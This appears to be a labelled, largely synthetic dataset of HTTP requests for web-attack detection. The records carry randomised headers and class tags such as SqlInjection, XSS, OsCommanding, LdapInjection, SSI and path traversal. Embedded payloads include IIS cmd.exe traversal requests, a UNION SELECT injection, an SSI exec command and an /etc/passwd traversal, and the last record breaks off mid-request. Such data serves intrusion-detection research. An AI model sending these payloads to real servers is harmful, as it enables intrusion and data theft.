Cookie: ihieso=Dzul;9736=c9c4ZMhYZvy4;d2=&wherehagx;bryn8imneb2e=2hecse&;ge5cepweE4owd=p2otaezgsrIrNidehf;documentupdateidL=iwr)(  |(dwer=*)
Cookie2: $Version="208"
Date: Sun, 18 Nov 07 15:33:19 CET
ETag: W/"zSESMi609uroL3G"
Expect: hhhrtm
If-Modified-Since: Wed, 17 May 06 02:37:47 CET
If-Unmodified-Since: Mon, 29 Mar 04 19:16:34 GMT
If-Match: "eSvWpqsI@6bZDBW0R"
If-None-Match: *
If-Range: "xry4hEVnv_bBE2TR"
Max-Forwards: 3796
Pragma: no-cache
Proxy-Authorization: Basic bmg0SXR0VGc6dVRjbg==
Authorization: Basic bG5pZXA6RW5IZWpo
Range: -3,502-
Referer: /jlhhofM/vQe0Sep/9lTudiee/rdabqIta.fgf
TE: trailers,trailers,chunked;q=0.8
Trailer: Host
User-Agent: oaoefnha
UA-CPU: Sparc
UA-Disp: 873,752,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 825x605
Via: 4.2 221.132.52.231, 1.0 www.7gge.png:1
Transfer-Encoding: gzip
Upgrade: 7eeKe/5.6, Suar/6.3
Warning: 156 www.anuenrdb.jpg "stUa8h3rlELwts" 
X-Forwarded-For: 160.192.213.166
X-Serial-Number: 21391
----: ---------------------
~~~~~: ~~~~~~~~~~

RB@TmsRkN=nldRedewdhtaccestiframei&dneatanredHNl4d=5zr'elabu/qd&rhihSo=ltibnexeciabptf=nue0f7&prf7iua=fsy&3HsgpasswdwinntWl=3752&.j@WygIi=bHyOnG&atdzjhmeel0Q=a6Gv4bB@&tprnmks=EjhM&0@_mtGaPA8=ilS&esyartehpteh8c=5-c3irahhd&Htuseeihsaiuhs=klloaasuwfd&cz=089882&be0=6390800&itsxsblteLeCc=\on iuTrcpNl?Te oA&jtr4rmo6=97

End - Id: 39099
Start - Id: 48306
class: XPathInjection
GET /inH72is2ssea/rcetaEgrisdm3E/5PV3XJu@9oTBSDVLK/c7vf4qQE9B/6-sqselectBVQhttpsMe/tCUmF/nnsd4mau/N6Eg/l6weoo.js?u7tspsRt8=v&lP_YWmocha=e08&4Bo.Zy=tenullig&7whereuC_o=7350356&oDmc9ydcoSin=mWoZIqPX0.VE&yDeq=o2UVTSHdW HTTP/1.0
Host: www.erzwselKna.uk
Connection: eYosRm
Accept: image/*
Accept-Charset: x-mac-ce, shift_jis;q=0.0, iso-8859-6;q=0.1, iso-8859-4
Accept-Encoding: hrSru'    or  1<  oe/asNy1y/Mcs/child::text()[position()=6]   or 'uses'=    '
Accept-Language: *
Cache-Control: Oscern=wvson
Client-ip: 95.235.160.12
Cookie: yEddiiWmOyeoen=l&smacimghh3ihO
Cookie2: $Version="584"
Date: Tue, 14 Nov 06 24:56:12 UTC
ETag: "EdUon4nGDP@8SsAgf"
Expect: preieae1=rrnnt7r
From: eoohueg@assyib.com
If-Modified-Since: Sat, 26 Feb 05 18:26:27 UTC
If-Unmodified-Since: Sat, 03 Feb 07 10:40:53 GMT
If-Match: "zG9P38WYLfA7KIj4gngx"
If-None-Match: *
If-Range: *
Max-Forwards: 06
MIME-Version: 6.0
Pragma: edgh='awAsmtn'
Proxy-Authorization: Digest nonce
Authorization: Digest realm
Referer: http://www.eefare.com/uone7/tsauaZ/acoWtihn.html
TE: trailers,deflate,trailers
Trailer: Proxy-Authorization
User-Agent: deitdyptrrdiltrae
UA-Disp: 296,6544,16
UA-Pixels: 433x249
Via: Ief5/0.0 www.ayscels.jpg
Transfer-Encoding: identity
Upgrade: rkeue/0.5, esr10/3.0, 1eda/2.9, seo/9.6, 7lh/2.5
Warning: 104 www.qtdputp.jpeg "at7y4uOnor" "Mon, 05 Mar 07 04:00:21 UTC"
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 17618194843
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48306
Start - Id: 44194
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 128.89.73.42
Connection: close
Accept: */*;q=0.6
Accept-Charset: hz-gb-2312
Accept-Encoding: compress;q=0.4, identity
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 130.86.46.202
Cookie: o2mo=formF;xjpemaasxmovo=14399360;webspedsg=421973
Cookie2: $Version="1"
Date: Tue, 03 Aug 04 15:26:03 CET
ETag: "BRW_@ARVUq6pOiuJ"
Expect: yoeh
From: rOaz@gEadsxsee.biz
If-Modified-Since: Thu, 08 Dec 05 02:40:00 UTC
If-Unmodified-Since: Sun, 15 Jul 07 15:04:41 GMT
If-Match: "51GGEvrUjWv6RfhQUW"
If-None-Match: *
If-Range: "VOsY1E14NnShhSZ1A"
Max-Forwards: 5
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: NTLM bG5pdmV5b2lvbWVvemVpdWhlZW82b2xkbWlwbkVoN2U1dGFrb25saA==
Range: 22399-
Referer: /tggg/eSen/xRhPshf.nsf
TE: trailers,deflate,trailers
Trailer: Referer
User-Agent: 2vbOwnaltU http://www.baosYlsn.org
UA-CPU: PowerPC
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8125x427
Via: FTP/3.3 34.131.158.29:9022
Transfer-Encoding: deflate
Upgrade: daad/0.7, ule/2.7
Warning: 700 www.yhebtw99.tiff "Igi9im" 
X-Forwarded-For: 81.148.120.241
X-Serial-Number: 77570647240448229537
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44194
Start - Id: 41374
class: SqlInjection
PUT /eTsTgeavaDDislta8sa/t86/usri4DK_e37/lvimO4saydoro9rir/2_0aCaigSPFaccess_log/awocroU@u/S6/openp1Zo/exaqcLr.gif? HTTP/1.0
Content-Length: 79
Content-Language: tEr,moitil
Content-Encoding: deflate
Content-Location: /enloae/deaht6.htm
Content-MD5: YXNhdXJhYnJpbjN2emFldA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 08 Dec 09 19:04:10 GMT
Last-Modified: Mon, 31 Jul 06 05:35:08 CET
Host: www.a1lauyr5.st
Connection: keep-alive
Accept: application/*;q=0.3, application/*
Accept-Charset: windows-1254;q=0.3, iso-8859-7
Accept-Encoding: 
Accept-Language: 3Ld-sT, groDk-2neskaRe, Xtlsa7t-qhe;q=0.2, tnxtuhn-egegttn;q=0.9, EeoYe-d
Cache-Control: aicceubi='TTthlh'
Client-ip: 56.233.228.196
Cookie: mg9ehlxch9ul=tii%krMtmbdrope dminH;me=ry2raaxe@1cnneqlEwu;iheooos5=5kucorrr;4aeahsnd3BAc1=mSq-
Cookie2: $Version="6"
Date: Fri, 30 Sep 05 24:13:53 CET
ETag: "1szJG5Qqdon.9toUC3"
Expect: Nerh01=hehmt9
From: etwjo@ssads4fhr.it
If-Modified-Since: Sun, 16 Oct 05 11:50:51 UTC
If-Unmodified-Since: Mon, 07 Dec 09 06:06:48 CET
If-Match: "HxGiDB9@4Gw-ZbHh"
If-None-Match: *
If-Range: *
Max-Forwards: 2254
MIME-Version: 2.2
Pragma: rese='cOsc'
Proxy-Authorization: NTLM dG9ub1NydW50OUF5YWJudHluc3RhQnphaHB1d2l6dmFkaTRGdmlobnM=
Authorization: NTLM ZVNkNTFPaGFlb2FOcWo3ZWxycXF1bGhTbjMzYnRPNmc5aWt4bXBFSWVuY3dlb3Vu
Range: 32232-38984,57-
Referer: http://www.tvej.org/aquias/ntbr.jsp
TE: deflate,trailers,chunked
Trailer: Accept-Language
User-Agent: Mozilla/8.7 (Machintosh; U; PPC Mac OS X 8.4; ji-n4; rv:4.6.9) Gecko/57836392
UA-CPU: 68000
UA-Disp: 320,3937,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2355x6440
Via: HTTP/3.2 32.51.231.160:5, 3.6 29.37.162.151, HTTP/5.8 238.249.74.66
Transfer-Encoding: compress
Upgrade: nto/6.6, ero7er/3.3, Axmpf/2.4
Warning: 930 168.40.198.240 "aetrpi0rwwtHsS" 
X-Serial-Number: 102930294622
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

Bulw=Encmdodiv&8ahropaoicp8f=851616&uDo6n='  OR 'elrptRdnH'     = N' 

End - Id: 41374
Start - Id: 46900
class: XSS
POST /tMjmN_Lz@_lEZT_Nxmxe/qservicesLv6D4K_PCf5log/ehaUe7umdEas3fRptin4/izt490pf7eleatxbsQt/sjqR.sh? HTTP/1.0
Content-Length: 110
Content-Language: e357,E3snnybg,od
Content-Encoding: identity
Content-Location: /aAUe2sr/56dum.fgf
Content-MD5: bHltbG1tcng2aXRleGhpZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 15 Feb 09 19:12:07 UTC
Last-Modified: Mon, 20 Jul 09 08:07:45 UTC
Host: www.vt0s.de:2
Connection: keep-alive
Accept: audio/x-wav, image/*;q=0.0
Accept-Charset: isiri-3342;q=0.0, iso-8859-15;q=0.5, x-mac-ce, iso-8859-15, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 216.37.168.1
Cookie: aelibep=93459;an=nedaed7edftxm/l;QOhttpsIDNY=rNtRx.iDOi
Cookie2: $Version="07"
Date: Tue, 16 Sep 08 23:05:54 CET
ETag: W/"Ja-Xf31larpSBKW5Vf9s"
Expect: nn9rnaex=r6EnRms;Reh7=hco2naP
From: nbfea3@yM2KA0.biz
If-Modified-Since: Thu, 07 Apr 05 08:31:31 GMT
If-Unmodified-Since: Thu, 16 Jun 05 05:46:25 UTC
If-Match: "Rs0MEDjgCXp9YWEU1v"
If-None-Match: "@@5olZ5Fft-NpHF2"
If-Range: Sat, 16 Oct 04 04:44:41 CET
Max-Forwards: 157
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: f77db aetmsn=Lobo5twv
Range: -790
Referer: http://mi9dma8.biz/Iho5Tej.wav
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: iv5E (nAM7B2Tr)
UA-CPU: MIPS
UA-Disp: 457,6373,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8473x700
Via: rinlex/7.4 115.255.202.36
Transfer-Encoding: identity
Upgrade: c7hl/0.0, ojnjz/4.8, sotds/6.5
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

py2Rsys37EU=<div   onmouseover =   "  [alert ('envatfswhr');]    "   >&zaah=9iAol rmct

End - Id: 46900
Start - Id: 42341
class: SqlInjection
GET /atnnfug5mpirluulRay/5qlsSeeigZhaving/pwneo.php3?BMas_NSd=%27+group++by++users.id+++++having+0344%3D0344&ptmcncrdn=d%26o&tar=cT&guwjeppeaneEcq=irei4clecaeeKe01Hk&eeacg9nlaO=tSJU&S-AE=9&oYtdTe4=0078227&nnmdml7Vtfda=r%3F&c6tgvo=eUCy-4jg&kektiiplatlS=3248845&eFsunEgs=sha1et+rkasIx+ HTTP/1.1
Host: www.eiuktoNs.uk
Connection: 9rvejo
Accept: text/plain, text/xml;q=0.4, text/*
Accept-Charset: iso-8859-9;q=0.1
Accept-Encoding: *
Accept-Language: n-e
Cache-Control: only-if-cached
Client-ip: 234.69.56.127
Cookie: likeuM8D=9250156;8tirCslhofs=qtiWeie4(;ttypo=140058;pDirveiwgans=r-B-8Kv9tN;sGrf=ih(mnt5|il8fetcs0siAo
Cookie2: $Version="054"
Date: Fri, 20 Apr 07 11:49:53 GMT
ETag: W/"W3Dl8Wik9y5E8q13ewRG"
Expect: 100-continue
From: DiEa@y1ebyi.uk
If-Modified-Since: Sun, 05 Jun 05 10:42:52 GMT
If-Unmodified-Since: Tue, 07 Sep 04 09:19:21 CET
If-Match: *
If-None-Match: "kAFoLo6@VRtu3Cb"
If-Range: Wed, 09 Jul 08 24:27:17 UTC
Max-Forwards: 8745
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: nrRny etsaey=elewdabt
Authorization: Digest realm
Range: -42018,-510767
Referer: http://efDcleoi.net/rhssl/onytgfr/itJae/4ohvah/hFHLShi2.tiff
TE: gzip;q=0.6
Trailer: Proxy-Authorization
User-Agent: cOiO/4.2
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 999x243
Via: HTTP/7.4 www.ungit.jpg, 4.7 www.nyodtl.jpg, 6.2 5.187.23.67
Transfer-Encoding: deflate
Upgrade: eEtha/8.4
Warning: 478 44.68.67.163:8 "haHdehmpgh" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 51653386435804651
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42341
Start - Id: 37785
class: LdapInjection
GET /iotbh9ytsEaatcl/7pspeinshaoepue1/omvnlWpFwform/xtermaZL./j@XB.css?tac=arc6&eeqlaiac8t=rf8vOeZy0K&mz3servicesgnph-=%29%28++%7C%28displayName%3Dhad*%29+%28name+++%3Dhad*+++%29%28++mail%3Dhad*+++%29&endttgbmknowPgt=axt&sthgt3eR=t5%3A8Ehlog-%24ictw HTTP/1.1
Host: www.tneiec.it
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: t6ats-hteo;q=0.2, leUga-aiteoia;q=0.3, rlsT6b-dmhtha;q=0.3, omiSntee-r
Cache-Control: no-store
Client-ip: 224.119.48.3
Cookie: aEii=or\[tar t;ooHthnno6a=t_fsrfZSKs;wtretzt=8gntbldoeasb3;Eq01yDV=9
Cookie2: $Version="03"
Date: Thu, 22 Apr 04 18:30:12 UTC
ETag: W/"h6vB3KF92zhMxzvOX9n"
Expect: 100-continue
From: 0toi@nMoY9ioe.ch
If-Modified-Since: Sun, 01 Oct 06 09:49:08 UTC
If-Unmodified-Since: Mon, 28 Jul 08 08:54:41 GMT
If-Match: "IeQr@ILlnr-Y.eTaVy"
If-None-Match: *
If-Range: Mon, 07 Jun 04 21:32:17 GMT
Max-Forwards: 348
MIME-Version: 1.4
Pragma: iteVh='f5'
Proxy-Authorization: RanlI8 hfn2me8l=cnlo
Authorization: NTLM cXpocmF0NGhHeWN0ZUNHZXN5NGFzb2FOczVUdTVlbElydmhobw==
Range: 479-,836-,84-
Referer: /ezost/tmanofr.cgi
TE: gzip,trailers
Trailer: Expect
User-Agent: Mozilla/8.6 (Windows; U; Win 9x 2.5; ga-i8; rv:0.7.9) Gecko/38878427
UA-CPU: Sparc
UA-Disp: 3289,383,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 807x162
Via: 8.5 www.rnmkkap.htm, 5.1 55.252.82.30, 2.3 150.148.99.102
Transfer-Encoding: deflate
Upgrade: 1wi/0.9, ue5/8.1, uoi/7.4
Warning: 319 211.214.89.238 "adgomoeic1o7Sowrtnl" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 0381591746319527137
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37785
Start - Id: 42520
class: SqlInjection
GET /ez/2_/HbouenaenuRtbidg/uR8o/N2ude3nodeYn/xdtstineDse3ndnmtn/@ZperlsamN/tt/xxJa/s.aIO81Kachr1qC2972E/iPSkhAulIVDo0Xf1Ff/tymXZ.6Hrc8liu51U.php4?eDe9i=iDMWxeUlO&cct=btitiAt&lttgi9i=033649597&qo=09611898&is=%27+++%29+++UNION+++++ALL+++SELECT++++624+++FROM++++ao+++++WHERE++++%28++++%27%27++%3D+++%27&ntuehoarniv=090168&iNNnqj5hSZw=i7a+ HTTP/1.1
Host: 22.30.46.18
Connection: close
Accept: text/*;q=0.7, text/html;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 150.204.153.72
Cookie: nhtstaiEtrsalai=sWDx;rylepeena0wt=2034;Ghortbs=e2R
Cookie2: $Version="7"
Date: Fri, 20 Jul 07 18:28:32 CET
ETag: "QTJNs90GRqYP0w9uxk2"
Expect: 100-continue
From: be38Ged@6e9snto.ch
If-Modified-Since: Sat, 06 Jun 09 02:07:16 UTC
If-Unmodified-Since: Sun, 08 Jan 06 13:45:08 CET
If-Match: "kpzyFdqRlRCIkQUVXBiE"
If-None-Match: *
If-Range: Sun, 24 Jul 05 21:46:04 CET
Max-Forwards: 43
MIME-Version: 6.0
Pragma: 5b=lEen
Proxy-Authorization: NTLM NXRXZGh0ZW81bXNzbm1nYXhudm1UZGR0aWFhZmVmcGV0c2FuZWVLZXJlcnM=
Authorization: 8ehr6 GhImtA=ele8v
Range: 430-,2-8084
Referer: /aoswMden/nTEeswqe.msf
TE: trailers
Trailer: Via
User-Agent: Mozilla/7.5 (Machintosh; U; PPC Mac OS X 9.1; cm-Nt; rv:6.4.7) Gecko/76089768
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: ipI9Op/9.0 133.222.208.100, 5.0 157.87.77.239
Transfer-Encoding: identity
Upgrade: iiruhh/4.7, Tnar/9.2, osto/3.0, ouuar/8.2
Warning: 039 www.rscr.js "tEodeseiset5e5eLbAid" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 68264538863472
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42520
Start - Id: 44160
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.uiyOm.be:4166
Connection: keep-alive
Accept: image/*;q=0.8, text/plain;q=0.1, video/*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 165.243.248.164
Cookie: rdt=6Ostdinlqpand c\tsG
Cookie2: $Version="971"
Date: Sat, 19 Jun 04 21:09:20 CET
ETag: "fs5xbNlo-GIu_ej"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Wed, 17 Mar 10 19:34:04 CET
If-Unmodified-Since: Tue, 11 Mar 08 22:07:27 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Nov 04 07:58:01 GMT
Max-Forwards: 2434
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest response="588D5566B01CAeB4251C23B5AbBA4929"
Authorization: Digest realm
Range: 815-,644-20793
Referer: /wtviimea/c3lmsl/noto2/npf3hdwz/6frot7o.nsf
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/3.6 (Windows; U; WinNT 3.6; 3e-d1; rv:6.3.5) Gecko/11456998
UA-CPU: Sparc
UA-Disp: 0908,917,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5788x525
Via: FTP/8.7 107.152.169.202
Transfer-Encoding: identity
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 498 131.29.120.151 "6ou22erwP9" "Sun, 02 Oct 05 20:11:01 CET"
X-Forwarded-For: 122.146.226.211
X-Serial-Number: 50318927121848032
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44160
Start - Id: 43810
class: OsCommanding
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 228.18.163.128
Connection: atcIh
Accept: video/*, application/*, video/mpeg
Accept-Charset: *;q=0.1
Accept-Encoding: gzip;q=0.6, gzip, identity
Accept-Language: *;q=0.7
Cache-Control: max-age=918
Client-ip: 117.85.13.55
Cookie: FRshutdown8Cn-jf=15598;ee3fCn1mh=iuhc
Cookie2: $Version="9"
Date: Thu, 30 Jun 05 09:21:37 UTC
ETag: W/"ZWarviPtT3Lux5IR2"
Expect: trty=ewnjetuk;ec4Oaae=mthnicad
From: uZkpt@nesht4Iih.ch
If-Modified-Since: Mon, 04 Jan 10 02:16:34 CET
If-Unmodified-Since: Fri, 10 Jun 05 21:26:02 UTC
If-Match: *
If-None-Match: "coV8IVwYjBxRDjgA"
If-Range: Tue, 06 Apr 04 13:52:08 GMT
Max-Forwards: 945
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: ohtI Fgiueot=04Bshd
Range: 904036-,02113-35,44499-
Referer: http://www.nrLha.de/tRoKsial/6iraf.pl
TE: deflate;q=0.8
Trailer: Accept-Charset
User-Agent: mtfywafEna (l62_Z8AeS; mybI1Rd1; aZnpDq; 7X__A0w; rGZHGdZI)
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 057x9927
Via: 3.1 7.18.27.109
Transfer-Encoding: identity
Upgrade: eprO5e/8.0, stnNLn/3.7, rEev/8.9
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 73.32.142.166
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43810
Start - Id: 37748
class: LdapInjection
GET /PHEHZR.sh?7xeolsahd4j=rtEOrdwinntaycdL&ue=est7i%29%28%26%28objectClass+++%3Duie*%29&VqSgYUhomeUXc=w%7Cc+u&ylaSnermnUt5SE9=nN.WGBcj9&EauhssmNErhdoet=i6tknnl&B7no=Rlcu&hsaXqte=58&lnW=46464&ze23sg5fviUi=eivseei%25ee&Ols=17&yrdagse=n4niefdaql1&l5u=0658023927&wExr2mye=l&86nph-d85copyhttp=iWaxwnVDX_&tahd=mnV HTTP/1.0
Host: 4.237.41.24:11768
Connection: keep-alive
Accept: audio/*;q=0.0
Accept-Charset: iso-8859-4;q=0.2
Accept-Encoding: compress;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 18.137.252.198
Cookie: fhijkeolg=o rom;rintirnn=1;ch9tlleectyue=anrpp
Cookie2: $Version="98"
Date: Sun, 25 Nov 07 06:22:13 CET
ETag: W/"6L-X_u4z8Jt7prV8D"
Expect: aeHari=nagcshtt
From: ft5sbsfs@ttt1ze.uk
If-Modified-Since: Sun, 11 Nov 07 21:24:13 UTC
If-Unmodified-Since: Wed, 11 Feb 04 18:23:55 UTC
If-Match: *
If-None-Match: "r0XA-A1E5jHQzyGng.d"
If-Range: "gSUKkBYD5J9.RttPpT"
Max-Forwards: 70
MIME-Version: 0.5
Pragma: no-cache
Authorization: NTLM dW1jdWFvZTVpeDN0bml0aUR1dHJ1bmRTaUl0dGxoZW9hcnJzMmd1cHJlbTVzZHA=
Range: 77072-956,71936-1169
Referer: /eU6rsb/xryaiEls/xt2p/gdeh/ytolqea.fgf
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.2 (Machintosh; U; PPC Mac OS X 6.7; 2s-7d; rv:6.3.9) Gecko/50473546
UA-CPU: MIPS
UA-Disp: 907,560,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 842x443
Via: 6.2 76.136.109.186
Transfer-Encoding: compress
Upgrade: esS/4.5, qssn/5.3, wig/2.0
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 33.253.224.201
X-Serial-Number: 4395839
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37748
Start - Id: 50110
class: XPathInjection
POST /ku7aIGUCzposition4T/rlnhkfntbueUt/d3VwyFW/2U_.html? HTTP/1.1
Content-Length: 89
Content-Language: He,eEi,sow
Content-Encoding: compress
Content-Location: http://www.t68tgcxn.gov/Uwtdo.zip
Content-MD5: ckFjQWY2aHRudWdlbXdueQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Jun 06 18:51:54 GMT
Last-Modified: Tue, 01 Nov 05 22:12:42 CET
Host: www.cryoeh.org:29
Connection: close
Accept: audio/basic;q=0.0, image/*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: otpa4yeb-a;q=0.0, aosSs-a, s-eo1e;q=0.8
Cache-Control: no-store
Client-ip: 60.7.64.88
Cookie: rday3ieiIxet=o0O/Ecnhio/E/child::node()[   position()=77]  | a/rrw0/pik/child::text()[position()=3]     or  'sba'  ='
Cookie2: $Version="0"
Date: Fri, 03 Nov 06 03:00:52 UTC
Expect: ttyio=6smein9d;onzgc=icoaCe
From: Ee6Znomo@lMshatar.org
If-Modified-Since: Tue, 27 Jan 04 06:20:04 CET
If-Unmodified-Since: Mon, 11 Apr 05 13:13:25 UTC
If-Match: "s11VKJ3QmPlQarX6Kg"
If-None-Match: "8GV1A7FE2j6xdZtMnxa"
If-Range: *
Max-Forwards: 1
MIME-Version: 2.2
Pragma: no-cache
Authorization: Digest response="7db646e4Af8c37da276Adf54DaCFaDde"
Referer: /synsre2e/l7eb.js
Trailer: From
User-Agent: 4htra3scu (yRWXljipj; 5@6ePO; thr29fKE)
UA-CPU: Sparc
UA-Disp: 9729,4869,32
UA-Color: color16
UA-Pixels: 5252x0947
Via: e1bn2h/8.2 69.32.29.189
Transfer-Encoding: deflate
Upgrade: ls5c/8.9, Ideoh/9.7, ieecu/9.7, tteHt/2.8, ttv/7.8
Warning: 212 53.139.159.27 "triyogjsloIpo" "Sat, 11 Dec 04 17:13:36 UTC"
X-Serial-Number: 96934723
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rp=4743623869&tuSs8heR=93&egtsb6b=089&in=h&ss&tyese=4&mMleIt=esab8&PDtfGRQHa=fsaasi3acu

End - Id: 50110
Start - Id: 40335
class: SSI
GET /ilKLp/l.WY-wH/V1ZRk1iZPO/OpsvBE@/tocboshahutbMins/chIt3o9iir7tjbTu/VXNqxkMloh-S-s/b1es6tuaIeeb7ySrIa/a9I_tfV4/orTeiwit0/rzwx-5n8Atz/iYCkiRA79PzEFEsuF.shtml?A5SQCnc_=nmtgIP&znullTlUk=%3C%21--+++++%23exec+++++cmd%3D%22c%3A%5Cprogra%7E1%5Cslcwu%5CaLliaeeeeN%5CFeAa.exe++d%3A%5Cbebst%5Cwww.siinsita.org%5Cmetotwcn%5Cdatabase.mdb++%2Fx++exporttofoxpro%22--%3E&4c9h8NuinfrNsmt=7292&rel6lcgif=ktaotsscriptwherepss&CFExtermZ=1162348 HTTP/1.0
Host: www.carmL18.biz
Connection: keep-alive
Accept: application/rtf, video/*;q=0.3, audio/*
Accept-Charset: windows-1254, iso-8859-4;q=0.9, utf-8, windows-1255;q=0.3, euc-cn
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 21.250.170.182
Cookie: u6r3biyeaxa61=0768200;6RDm3Tintdie=oNhsR
Date: Fri, 24 Jul 09 14:19:17 CET
ETag: "-2SnMmPGNUPDo6afli"
Expect: 100-continue
If-Modified-Since: Wed, 13 Sep 06 04:53:14 UTC
If-Unmodified-Since: Sat, 22 Aug 09 09:37:43 GMT
If-Match: "ooQQlDnj1FdZvrO7yjE-"
If-None-Match: *
If-Range: Sun, 18 May 08 24:34:33 CET
Max-Forwards: 1663
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest response="294CCE866907f6d2817d414d28f0AeF8"
Authorization: NTLM ZXFiZXRpc3M3amRiY1NpbXA5Y3dld08wb3J4ZXN3YXVzZGlhemVyZkVl
Range: -636724,210954-
Referer: http://www.AoCNars.biz/Onheunp.jsp
TE: deflate
User-Agent: tead/3.8.2.6.2
UA-CPU: StrongARM
UA-Disp: 041,313,32
UA-Color: color8
UA-Pixels: 384x228
Via: HTTP/2.0 221.89.128.117
Transfer-Encoding: deflate
Upgrade: ogu/6.9, nh0i/0.5, njHtk/8.8, I6inrl/2.9, Eflir/9.1
Warning: 563 www.ptln.png:756 "oeoaCord" "Sat, 26 Mar 05 04:53:57 GMT"
X-Forwarded-For: 42.162.17.85
X-Serial-Number: 22985

null

End - Id: 40335
Start - Id: 46330
class: PathTransversal
GET /74wdrBe@B/ieeur/2_RIH0jSwindow.openuR/qEZ__@@h/hecho%uallFBqUvY.php4?icsftei5b3=325&HxRi7q=Eeodivp&his7s=ma%5Cpg&sdcf=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&rbt3jl=ihszn1sret&tio75tk7=bZt+AipCs&.4gr0e=Lbkebjk&cewinntrm@vfnFv=ea6n HTTP/1.1
Host: 239.147.45.22
Connection: eTdd
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: *
Accept-Language: t0il0Ns4-y6, s-torea;q=0.9, b-omu;q=0.4, tytxes8-r5st;q=0.3, srns-8
Cache-Control: no-store
Client-ip: 146.96.8.202
Cookie: c5op=rlhwinntt]w3En;taerri5t8et7me=tGKmNLY@mKi;-UHFL=b75lxZPK;IOe6eatrhusiihi=mWLiS87k
Cookie2: $Version="07"
Date: Wed, 15 Apr 09 13:59:31 UTC
ETag: "@85HgN2pUsOQN6a@owQ"
Expect: 100-continue
From: 5alenh@genhnf8.org
If-Modified-Since: Sat, 30 Apr 05 17:27:34 GMT
If-Unmodified-Since: Tue, 24 Feb 09 14:54:38 GMT
